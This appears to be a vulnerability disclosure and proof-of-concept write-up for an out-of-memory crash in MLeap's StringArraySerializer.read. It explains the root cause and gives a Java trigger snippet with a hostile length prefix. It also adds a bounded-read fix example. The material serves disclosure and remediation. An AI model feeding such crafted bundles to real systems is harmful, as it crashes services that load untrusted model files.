MLeap StringArraySerializer OOM PoC
Proof-of-concept for an uncontrolled resource consumption vulnerability in MLeap's StringArraySerializer.read.
Files
evil.mleap: crafted MLeap bundle ZIP. Loading it triggers OutOfMemoryError via new Array[Byte](0x7FFFFFFF) in StringArraySerializer.read.
Reproduce
import struct, zipfile, io, base64
from mleap.pyspark.spark_support import SimpleSparkSerializer
# Or load via BundleFile in Scala/Java:
# BundleFile.load("evil.mleap")
Root Cause
StringArraySerializer.read calls din.readInt() on attacker-controlled bytes and passes the result directly to new Array[Byte](size) with no bounds check. OutOfMemoryError extends VirtualMachineError; Scala's NonFatal extractor returns false for it, so the surrounding Try{} does not catch it — the error propagates and crashes the process.
Trigger (Java)
DataInputStream din = new DataInputStream(
    new ByteArrayInputStream(new byte[]{0x7F,(byte)0xFF,(byte)0xFF,(byte)0xFF}));
int size = din.readInt(); // 2147483647
byte[] bytes = new byte[size]; // OutOfMemoryError: Requested array size exceeds VM limit
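A bounded form of the length-prefixed read described under Root Cause, as an added example (not MLeap's code and not part of the PoC): the prefix is validated before any allocation, so a hostile value surfaces as an IOException, which Scala's NonFatal does match, instead of an OutOfMemoryError. The class name, the readBounded helper and the MAX_STRING_BYTES cap are assumptions chosen for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.DataInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class BoundedRead {
    // Assumed cap for one serialized string; set it to the largest legitimate value.
    static final int MAX_STRING_BYTES = 1 << 20;

    // Reads a length-prefixed byte array, rejecting the prefix before allocating.
    static byte[] readBounded(DataInputStream din, int maxLen) throws IOException {
        int size = din.readInt();
        if (size < 0 || size > maxLen) {
            throw new IOException("length prefix " + size + " outside [0, " + maxLen + "]");
        }
        byte[] bytes = new byte[size];
        din.readFully(bytes); // EOFException if the stream is shorter than the prefix claims
        return bytes;
    }

    static DataInputStream stream(byte[] data) {
        return new DataInputStream(new ByteArrayInputStream(data));
    }

    public static void main(String[] args) throws IOException {
        // Constructed input: the same 4-byte prefix as the trigger above (0x7FFFFFFF).
        byte[] hostile = {0x7F, (byte) 0xFF, (byte) 0xFF, (byte) 0xFF};
        try {
            readBounded(stream(hostile), MAX_STRING_BYTES);
            System.out.println("unexpected: hostile prefix accepted");
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }

        // Constructed input: prefix 5 followed by the bytes of "hello".
        byte[] ok = {0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o'};
        byte[] value = readBounded(stream(ok), MAX_STRING_BYTES);
        System.out.println(new String(value, StandardCharsets.UTF_8));

        // Constructed input: prefix within the cap but longer than the data that follows.
        byte[] truncated = {0, 0, 0, 9, 'h', 'i'};
        try {
            readBounded(stream(truncated), MAX_STRING_BYTES);
        } catch (IOException e) {
            System.out.println("rejected: " + e);
        }
    }
}
```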